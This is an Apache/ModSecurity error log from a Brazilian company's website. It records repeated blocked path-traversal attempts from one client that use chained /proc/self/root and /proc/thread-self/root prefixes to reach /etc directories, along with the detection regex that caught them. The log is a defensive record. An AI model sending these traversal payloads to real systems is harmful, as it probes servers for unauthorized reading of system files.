[Thu Mar 19 05:13:27.871511 2026] [:error] [pid 27293:tid 140411716749056] [client 74.7.243.128:52340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwJ_-YZRR_7pZ7nDJgJAAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:32.334100 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:52354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwLNa6ubjKNq_cu4YWEwAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:34.797623 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.243.128:50628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwLQbLMZ6AikZjR9UwVAAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:36.297371 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:50640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwMOoXxyEfFpUF8f_jtgAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:36.461819 2026] [mime_magic:error] [pid 27293:tid 140411590858496] (70014)End of file found: [client 57.141.18.76:58054] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:13:38.677689 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.243.128:50644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwMhkFeYa1D6dYQnDBsgAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:13:45.586388 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.243.128:53480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwOQbLMZ6AikZjR9UwYQAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:49.099652 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.243.128:53490] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwPQbLMZ6AikZjR9UwaQAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:53.456048 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.243.128:50602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwQV_V7PWP6ixUYl6OwgAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:13:54.748115 2026] [:error] [pid 19093:tid 140411649607424] [client 74.7.243.128:50606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwQl_V7PWP6ixUYl6OwwAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:13:57.913091 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:50612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwRMdf6f5d65gmYZRGeAAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:13:59.477307 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:42820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwR8df6f5d65gmYZRGfQAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:14:17.119182 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:42834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwWQkwaGbbGflqUZCJugAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:14:21.068517 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:60690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwXda6ubjKNq_cu4YWKgAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:14:37.812973 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:51240] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwbeyqAr6etmhZHNo2mgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:14:41.852834 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.228.61:38958] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuwcV_V7PWP6ixUYl6O6QAAAoE"]
[Thu Mar 19 05:14:42.507688 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:53620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwcvu8EFLIOrSqIptx4QAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:14:56.855083 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:55480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwgNa6ubjKNq_cu4YWTwAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:01.633912 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:42458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwhQkwaGbbGflqUZCJywAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:08.718699 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:47058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwjAkwaGbbGflqUZCJ0gAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:10.221395 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:50842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwjsdf6f5d65gmYZRGjwAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:12.635147 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.243.128:50846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwkAbLMZ6AikZjR9UwnAAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:14.037204 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:50862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwkgkwaGbbGflqUZCJ1gAAANQ"], referer: 